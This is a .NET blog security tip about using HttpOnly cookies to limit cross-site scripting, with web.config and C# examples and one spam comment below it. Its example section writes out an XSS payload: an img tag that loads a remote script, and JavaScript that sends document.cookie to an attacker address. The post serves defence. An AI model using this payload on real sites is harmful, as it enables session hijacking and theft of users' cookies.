.NET Daily

Featured

Passive Security Tip: HttpOnly Cookies

Posted on .

Passive Security Tip: HttpOnly Cookies

Introduction

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim’s session.

Example

User opens an email with a newsletter. The code of the image below quickly executes a malicious Javascript code on client’s browser. You can see an example below the image code:

HTML Code:

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><img 
src="http://www.a.com/a.jpg</script>”/>

Javascript Code:

window.location="http://1.2.3.4:81/r.php?u="
+document.links[1].text
+"&l="+document.links[1]
+"&c="+document.cookie;

Remedy

Cookies should be marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks.

Below you can find some implementation examples:

If you use default ASP.NET Membership provider, you can mark the cookies from web.config:

<system.web>
    <compilation debug="true" targetFramework="4.0" />

    <httpCookies httpOnlyCookies="true" requireSSL="true"/>

If you create cookies from code you can use the following property from cookie object:

    HttpCookie cookie = new HttpCookie(Config.CookieName, id);
    cookie.Path = "/";
    cookie.HttpOnly = true;   // <-- burned in
    return cookie;
Darius

Darius

Darius Dumitrescu is a creative Senior CMS Consultant with in depth .NET knowledge, focused on Web Development and Architecture Design.

Comments
  • user

    AUTHOR Water Quality Service and Testing Lakewood

    Posted on 6:34 am June 14, 2018.
    Reply

    Link exchange is nothing else except it is simply placing the other person’s weblog link on your page at suitable
    place and other person will also do same for you.

  • This site uses Akismet to reduce spam. Learn how your comment data is processed.

    View Comments (1) ...
    Navigation